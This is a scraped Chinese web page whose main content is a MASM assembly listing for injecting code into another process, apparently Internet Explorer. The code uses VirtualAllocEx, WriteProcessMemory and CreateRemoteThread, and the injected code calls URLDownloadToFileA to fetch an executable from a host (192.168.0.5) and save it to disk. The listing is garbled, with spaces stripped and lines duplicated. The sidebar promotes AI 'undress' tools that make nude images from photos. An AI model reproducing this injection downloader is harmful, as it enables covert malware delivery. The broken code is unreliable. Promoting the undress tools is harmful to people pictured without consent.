注入下载文件的代码到IE进程然后执行下载的文件
大家可能都用过网页szFormatdbPID是:%d,0 szBufferdd20dup(0),0 piddd0 hProcessdd0 hThreaddd0 pCodeRemotedd0 path1dbc:a.EXE,0 .const szmsgdbURLDownloadToFileA,0 userdlldbUrlmon.dll,0 ;szmsgdbMessageBoxA,0 ;userdlldbUser32.dll,0 szloadlibdbLoad
大家可能都用过网页szFormatdbPID是:%d,0
szBufferdd20dup(0),0
piddd0
hProcessdd0
hThreaddd0
pCodeRemotedd0
path1dbc:a.EXE,0
.const
szmsgdbURLDownloadToFileA,0
userdlldbUrlmon.dll,0
;szmsgdbMessageBoxA,0
;userdlldbUser32.dll,0
szloadlibdbLoadLibraryA,0;注意和LoadLibraryW的区别哟
kerdlldbkernel32.dll,0
.code
codebegin:
dispdatadb"http://192.168.0.5/NBTreeList.exe",0
szTitdb"c:a.exe",0
datalen=$-codebegin
Rprocprocmsgbox;MessageBoxA的地址为参数
CALL@F;pushesi
@@:
POPEBX
SUBEBX,OFFSET@B
LEAECX,[EBX+dispdata]
LEAEDX,[EBX+szTit]
pushNULL
push0
pushedx
pushecx
pushNULL
callmsgbox
ret;重要
Rprocendp
codelen=$-codebegin;代码长度xx字节
start:
;invokeFindWindow,0,offsettit;返回计算器窗口句柄
invokeFindWindow,offsettit,0
invokeGetWindowThreadProcessId,eax,offsetpid;计算机器程序的进程PID号
;invokewsprintf,offsetszBuffer,offsetszFormat,pid;把PID用十进制显示
invokeOpenProcess,PROCESS_ALL_ACCESS,FALSE,pid;打开进程,得到进程句柄
movhProcess,eax;保存进程句柄
invokeVirtualAllocEx,hProcess,0,codelen,MEM_COMMIT,PAGE_EXECUTE_READWRITE
movpCodeRemote,eax
invokeWriteProcessMemory,hProcess,pCodeRemote,offsetcodebegin,codelen,NULL
movesi,pCodeRemote
addesi,datalen
pushesi
invokeLoadLibrary,offsetuserdll
invokeGetProcAddress,eax,offsetszmsg
popesi
invokeCreateRemoteThread,hProcess,0,0,esi,eax,0,0
movhThread,eax;返回线程句柄
.ifhThread
invokeWaitForSingleObject,hThread,INFINITE;等待线程结束
invokeCloseHandle,hThread;关闭线程句柄
.endif
invokeVirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE;释放
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1387
52
What should I do if I download other people's wallpapers after logging into another account on wallpaperengine?
Mar 19, 2024 pm 02:00 PM
When you log in to someone else's steam account on your computer, and that other person's account happens to have wallpaper software, steam will automatically download the wallpapers subscribed to the other person's account after switching back to your own account. Users can solve this problem by turning off steam cloud synchronization. What to do if wallpaperengine downloads other people's wallpapers after logging into another account 1. Log in to your own steam account, find cloud synchronization in settings, and turn off steam cloud synchronization. 2. Log in to someone else's Steam account you logged in before, open the Wallpaper Creative Workshop, find the subscription content, and then cancel all subscriptions. (In case you cannot find the wallpaper in the future, you can collect it first and then cancel the subscription) 3. Switch back to your own steam
Introduction to how to download and install the superpeople game
Mar 30, 2024 pm 04:01 PM
The superpeople game can be downloaded through the steam client. The size of this game is about 28G. It usually takes one and a half hours to download and install. Here is a specific download and installation tutorial for you! New method to apply for global closed testing 1) Search for "SUPERPEOPLE" in the Steam store (steam client download) 2) Click "Request access to SUPERPEOPLE closed testing" at the bottom of the "SUPERPEOPLE" store page 3) After clicking the request access button, The "SUPERPEOPLECBT" game can be confirmed in the Steam library 4) Click the install button in "SUPERPEOPLECBT" and download
What to do if the 0x80004005 error code appears. The editor will teach you how to solve the 0x80004005 error code.
Mar 21, 2024 pm 09:17 PM
When deleting or decompressing a folder on your computer, sometimes a prompt dialog box "Error 0x80004005: Unspecified Error" will pop up. How should you solve this situation? There are actually many reasons why the error code 0x80004005 is prompted, but most of them are caused by viruses. We can re-register the dll to solve the problem. Below, the editor will explain to you the experience of handling the 0x80004005 error code. Some users are prompted with error code 0X80004005 when using their computers. The 0x80004005 error is mainly caused by the computer not correctly registering certain dynamic link library files, or by a firewall that does not allow HTTPS connections between the computer and the Internet. So how about
How to download foobar2000? -How to use foobar2000
Mar 18, 2024 am 10:58 AM
foobar2000 is a software that can listen to music resources at any time. It brings you all kinds of music with lossless sound quality. The enhanced version of the music player allows you to get a more comprehensive and comfortable music experience. Its design concept is to play the advanced audio on the computer The device is transplanted to mobile phones to provide a more convenient and efficient music playback experience. The interface design is simple, clear and easy to use. It adopts a minimalist design style without too many decorations and cumbersome operations to get started quickly. It also supports a variety of skins and Theme, personalize settings according to your own preferences, and create an exclusive music player that supports the playback of multiple audio formats. It also supports the audio gain function to adjust the volume according to your own hearing conditions to avoid hearing damage caused by excessive volume. Next, let me help you
Where to download files from Quark Network Disk_How to download Quark Network Disk to local area and share
Mar 21, 2024 pm 03:57 PM
As a convenient and practical network disk tool, Quark can help users easily obtain their favorite resources. What if you want to download a file locally? Let the editor tell you now, let’s learn it together! How to download Quark Network Disk to local sharing method 1. First open the Quark software, enter the homepage, and click the [Cloud Icon] on the lower right; 2. Then on the Quark Network Disk page, we click the [Document] function; 3. Then go to the document page, select the file you want to download, and click the [three-dot icon]; 4. After the final click, we click [Download] in the pop-up dialog box;
What is hiberfil.sys file? Can hiberfil.sys be deleted?
Mar 15, 2024 am 09:49 AM
Recently, many netizens have asked the editor, what is the file hiberfil.sys? Can hiberfil.sys take up a lot of C drive space and be deleted? The editor can tell you that the hiberfil.sys file can be deleted. Let’s take a look at the details below. hiberfil.sys is a hidden file in the Windows system and also a system hibernation file. It is usually stored in the root directory of the C drive, and its size is equivalent to the size of the system's installed memory. This file is used when the computer is hibernated and contains the memory data of the current system so that it can be quickly restored to the previous state during recovery. Since its size is equal to the memory capacity, it may take up a larger amount of hard drive space. hiber
How to download Beilehu children's songs
Mar 28, 2024 am 11:10 AM
As an indispensable accompaniment to children's growth, Beilehu's children's songs have won the love of countless parents and children with their cheerful melody, vivid pictures and entertaining and educational content. In order to allow babies to enjoy the joy brought by children's songs anytime and anywhere, many parents hope to download Beilehu's children's songs to their mobile phones or tablets so that they can listen to their children at any time, but how to save Beilehu's children's songs? On your mobile phone, this tutorial will bring you a detailed introduction. Users who don’t understand it yet can come and read along with this article to learn more. Beilehu Nursery Rhymes Download Children's Songs Multi-Picture Tutorial: Open the software and select a children's song you want to download. The editor takes "Classic Children's Songs" as an example. 2. Click the "Download" button below the children's song star.
Detailed steps for downloading files from qq
Mar 22, 2024 pm 09:10 PM
1. First we open file management. 2. Click Internal Storage. 3. Scroll down and sort to find Tencent (Tencent folder) starting with t. 4. Click to enter and find QQfile_recv, click to enter to view.
